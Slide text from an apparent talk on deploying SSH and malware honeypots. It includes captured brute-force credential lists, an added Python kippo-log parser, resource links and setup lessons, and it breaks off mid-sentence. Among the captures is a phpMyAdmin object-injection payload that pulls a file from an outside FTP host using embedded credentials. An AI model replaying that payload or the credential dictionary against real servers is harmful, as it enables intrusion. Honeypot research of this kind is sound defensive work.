    logic/logic haiduc/haiduc telegest/telegest display/display
    art/art rapper/rapper mwyatt/mwyatt red/red
    a/a vova/vova j/j wolf/wolf
    diablo/diablo medina/medina luci/luci m/m
    desiree/desiree password/password silvia/silvia vcsa/vcsa
    b/b g/g apocalipsa/apocalipsa dummy/dummy
    b1ablo/d1ablo kim/kim simbol/simbol maria/maria
    slim/slim ionita/ionita boot/boot ion/ion
    abel/abel raper/raper best/best sah/sah
    c/c vava/vava ha/ha powered/powered
    paradise/paradise passwd/passwd k/k bombastik/bombastik
    eminem/eminem nicoara/nicoara postgres/postgres good/good
    doris/doris h/h lucian/lucian pink/pink
    shortcut/shortcut goncalo/goncalo apocalipse/apocalipse n/n
    d/d space/space ioana/ioana visa/visa
    paradisse/paradisse jurca/jurca skin/skin gianluca/gianluca
    shaggy/shaggy st/st addicted/addicted atb/atb
    damian/damian baba/baba bots/bots bus/bus
    adm/adm change/change thebest/thebest melania/melania
    e/e slayer/slayer l/l power/power
    baggio/baggio i/i gdm/gdm dudu/dudu
    haitac/haitac lucia/lucia box/box bela/bela
    rap/rap apoi/apoi maria/maria fantastic/fantastic
    jean/jean sst/sst ying/yiang bad/bad
  • blue/blue vh/vh putty/putty marian/marian
    luca/luca yahoo/yahoo ven/ven conterstrike/conterstrike
    claudius/claudius sly/sly cs/cs abo/abo
    o/o q/q s/s cretu/cretu
    mastercard/mastercard maryjane/maryjane tehnolog/tehnolog ness/ness
    buzzz/buzzz buzz/buzz leo/leo123 u/u
    bella/bella mago/mago herbagen/herbagen calcul/calcul
    mumu/mumu lammer/lammer romana/romana cimlinux/cimlinux
    mada/mada pasare/pasare caine/caine hacker/hacker
    skype/skype skywalker/skywalker shoot/shoot anton/anton
    sybille/sybille sims2/sims2 stat/stat germana/germana
    bed/bed tim/tim mandi/mandi europa/europa
    p/p discovery/discovery ana/ana slow/slow
    officeinn/officeinn hotmail/hostmail ambulator/ambulator race/race
    terriffic/terriffic vn/vn joc/joc portocala/portocala
    root/password accept/accept conter/conter mark/mark
    suga/suga marianne/marianne lp/lp v/v
    master/master xman/xman next/next cserv/cserv
    buz/buz r/r t/t ne/ne
    madalina/madalina matematica/matematica quatrida/quatrida atai/atai
    muie/muie bird/bird gaming/gaming creata/creata
    inger/inger pisica/pisica zeppelin/zeppelin casa/casa
    skipe/skipe bang/bang engleza/engleza reebok/reebok
    sims/sims madi/madi mandarina/mandarina gary/gary
    qwerty/qwerty lamer/lamer dog/dog tetranet/tetranet
    amex/amex pix/pix shot/shot rusia/rusia
    postgres/postgres sync/sync tara/tara granta/granta
  • smal/smal banana/banana yes/yes w/w
    ting/ting cretzu/cretzu nemesis/nemesis serv/serv
    arpanet/arpanet nee/nee caro/caro tax/tax
    moscova/moscova
  • Started – 10:10 pm November 5th
    • Total – 229 attempts from a single IP
    • Stopped – 4:51 pm November 6th
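Kippo's value is the log of every login attempt, and the three slides of user/password pairs plus the "229 attempts from a single IP" summary are what a small parser produces from it. The script below is an added example, not part of the talk: the log line shape is my recollection of kippo's ssh-userauth entries (adjust `LOGIN_RE` if your kippo.log differs), and the log lines themselves are constructed, using documentation addresses rather than the IPs from the slides. It reports attempts per source, the window each source was active, which attempts kippo accepted, and how many pairs are simply user/user, the dictionary signature that stands out in the lists above.

```python
import re
from collections import Counter
from datetime import datetime

# Assumed kippo log line shape, reconstructed from memory of kippo.log; adjust
# LOGIN_RE if your version formats the userauth line differently.
LOGIN_RE = re.compile(
    r"^(?P<ts>\d{4}-\d\d-\d\d \d\d:\d\d:\d\d[+-]\d{4}) "
    r"\[SSHService ssh-userauth on HoneyPotTransport,\d+,(?P<ip>[\d.]+)\] "
    r"login attempt \[(?P<user>[^/\]]*)/(?P<pw>[^\]]*)\] (?P<result>failed|succeeded)$")

# Constructed sample log (documentation addresses, not real attackers); the
# user/password pairs echo the style of the list on the slides.
SAMPLE_LOG = """\
2012-11-05 22:10:45+0000 [SSHService ssh-userauth on HoneyPotTransport,1,203.0.113.7] login attempt [root/password] failed
2012-11-05 22:10:47+0000 [SSHService ssh-userauth on HoneyPotTransport,1,203.0.113.7] login attempt [t1na/t1na] failed
2012-11-05 22:10:49+0000 [SSHService ssh-userauth on HoneyPotTransport,2,203.0.113.7] login attempt [oscar/oscar] failed
2012-11-05 22:10:51+0000 [SSHService ssh-userauth on HoneyPotTransport,2,203.0.113.7] login attempt [leo/leo123] failed
2012-11-05 22:10:53+0000 [SSHService ssh-userauth on HoneyPotTransport,3,203.0.113.7] login attempt [root/123456] succeeded
2012-11-05 22:11:02+0000 [SSHService ssh-userauth on HoneyPotTransport,4,198.51.100.9] login attempt [admin/admin] failed
2012-11-05 22:11:03+0000 [SSHService ssh-userauth on HoneyPotTransport,4,198.51.100.9] login attempt [admin/admin] failed
2012-11-05 22:11:05+0000 [HoneyPotTransport,4,198.51.100.9] connection lost
"""


def parse_attempts(text):
    """One dict per login attempt (ts, ip, user, pw, result); other lines are ignored."""
    attempts = []
    for line in text.splitlines():
        m = LOGIN_RE.match(line)
        if not m:
            continue
        d = m.groupdict()
        d["ts"] = datetime.strptime(d["ts"], "%Y-%m-%d %H:%M:%S%z")
        attempts.append(d)
    return attempts


def summarize(attempts):
    """Per-source counts and active windows, accepted logins, and the share of
    attempts whose password is just the username."""
    per_ip = Counter(a["ip"] for a in attempts)
    first, last = {}, {}
    for a in attempts:
        first.setdefault(a["ip"], a["ts"])   # attempts arrive in time order
        last[a["ip"]] = a["ts"]
    windows = {ip: (last[ip] - first[ip]).total_seconds() for ip in per_ip}
    pairs = Counter((a["user"], a["pw"]) for a in attempts)
    return {
        "total": len(attempts),
        "per_ip": per_ip,
        "window_seconds": windows,
        "user_equals_password": sum(1 for a in attempts if a["user"] == a["pw"]),
        "succeeded": [(a["ip"], a["user"], a["pw"]) for a in attempts
                      if a["result"] == "succeeded"],
        "top_pairs": pairs.most_common(5),
    }


if __name__ == "__main__":
    s = summarize(parse_attempts(SAMPLE_LOG))
    print(f"{s['total']} attempts, {s['user_equals_password']} with password == username")
    for ip, n in s["per_ip"].most_common():
        print(f"{ip:<14} {n:>4} attempts over {s['window_seconds'][ip]:.0f}s")
    for ip, user, pw in s["succeeded"]:
        print(f"accepted login from {ip}: {user}/{pw}  (watch the shell log for this session)")
```

The "succeeded" entries are the sessions worth reading in full, since kippo records the shell interaction that follows; the per-source window is the figure the "Started / Stopped" slide gives by hand.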
  • action=lay_navigation&eoltype=unix&token=&configuration=a:1:{i:0;O:10:"PMA_Config":1:{s:6:"source";s:45:"ftp://hawk1156:PKTuN123@hawkish.co.uk/ieh.ico";}}
    http://ubuntuforums.org/showthread.php?t=2076978
  • Websites
    • Honeynet Project – http://www.honeynet.org/
      • Dionaea – http://dionaea.carnivore.it/
      • Honeywall – https://projects.honeynet.org/honeywall/
    • Amun: Python Honeypot – http://amunhoney.sourceforge.net/
    • Kippo – http://code.google.com/p/kippo/
      • Examples
        • http://blog.macuyiko.com/2011/03/running-ssh-honeypot-with-kippo-lets.html
        • http://www.austinriba.com/2011/10/fun-and-trickery-with-the-kippo-ssh-honeypot/
    • ShadowServer – http://www.shadowserver.org/
    • Spiderlabs WASC Distributed Web Honeypots Project – http://blog.spiderlabs.com/2012/02/wasc-distributed-web-honeypots-project-update.html
  • Websites
    • Scumware – http://www.scumware.org/index.scumware
    • VirusTotal – https://www.virustotal.com/
    • TCPIPUtils – http://www.tcpiputils.com/ (Great Chrome extension)
  • Tools
    • Wireshark
    • Network Miner
    • NetWitness Investigator
  • A host at $IP ($location) tried to log into my honeypot's fake Terminal Services server
  • GET-based RFI attack from $IP ($location)
  • A host at $IP ($location) tried to log into my honeypot's fake MSSQL Server
    http://inguardians.com/
  • Keith Dixon
    @Tazdrumm3r
    #misec – Tazdrumm3r
    tazdrummer@gmail.com
    http://tazdrumm3r.wordpress.com
  • http://hakshop.myshopify.com/products/wifi-pineapple
    The Hot-Spot Honeypot Pen-Testing Platform
  • http://securityonion.blogspot.com/
    • Installing a honeypot? Why not have all the monitoring tools already in place?
      • And there are some bad ass tools on this distro.
    • Given that Security Onion is Xubuntu based and all of the honeypot installs are based on Lubuntu, I suspect there won’t be any issues.
      • I haven’t tested this to confirm. If you find out otherwise, email me. I’d love to know what you experience.
  • Mercury – Live Honeypot DVD
    ftp://ftp.carnivore.it/projects/dionaea/mercury-dvd
    http://blog.infosanity.co.uk/2010/09/22/mercury-live-honeypot-dvd/
    Mercury Live DVD was initially (I believe) announced in a post to the Nepenthes mailing list. It is a remastered Ubuntu distribution with pre-installed honeypot applications and malware analysis tools created by John Moore.
    From the ReadMe:
    This live DVD is a remastered version of Ubuntu 10.0 Beta LTS x86_32. It was designed due to my being disappointed with another reverse engineering malware live CD that was released recently. I have decided to call my creation MERCURY, which is an acronym for Malware Enumeration, Capture, and Reverse Engineering. The Mercury live DVD contains tools used for digital forensics, data recovery, network monitoring, and spoofing. It should primarily be used as a honeypot or network monitoring platform as well as a laboratory and teaching aid. There are three honeypots installed – honeyd, nepenthes, and dionaea. Four, if you
  • Scripts, tools and other lessons learned
    • Amun
      • amun_install.sh
        • Location to grab the file
        • How to set it up
    • Dionaea
      • install_dionaea.sh (Quick and easy setup)
      • install_dionaea_full_monty.sh (previously ran successfully on a Mint 12 install)
      • run_dionaea.sh
      • run_p0f_dionaea.sh (In case you want to capture OS information)
    • Glastopf
      • setup_glastopf.sh (Script untested, but ran through steps manually successfully)
    • Kippo
      • kippo_install.sh (This is one option on installing and running {last line runs it})
  • Scripts, tools and other lessons learned
    • Lessons learned
      • Run only one honeypot at a time
      • When running a honeypot from the cloud, test, test and retest your packet capture script
        • When in doubt, use dumpcap (it’s been the most successful for me)
      • Adjust the level of logging on dionaea if you’re running in the cloud, especially if you’re in an extremely active area.
        • Downloading a 4 GB log file from Ireland was not a quick process
        • First time running dionaea, log everything.
        • Adjust your logging level according to the information you see.
        • If a lot is not useful, dial it back a notch or two.
      • Install on an Ubuntu based system.
        • I tried installing on a Debian based load and ran into dependency issues.
        • The keyboard is small and I want to minimize the time at the keyboard. ;)
        • I haven’t tried Fedora or OpenSuSE or BSD based systems.
        • If you do, let me know your results. (See slide # 88 for my contact info)
      • Take the time to get a good dionaea config file.
        • Getting the malware is good. Automatically submitting to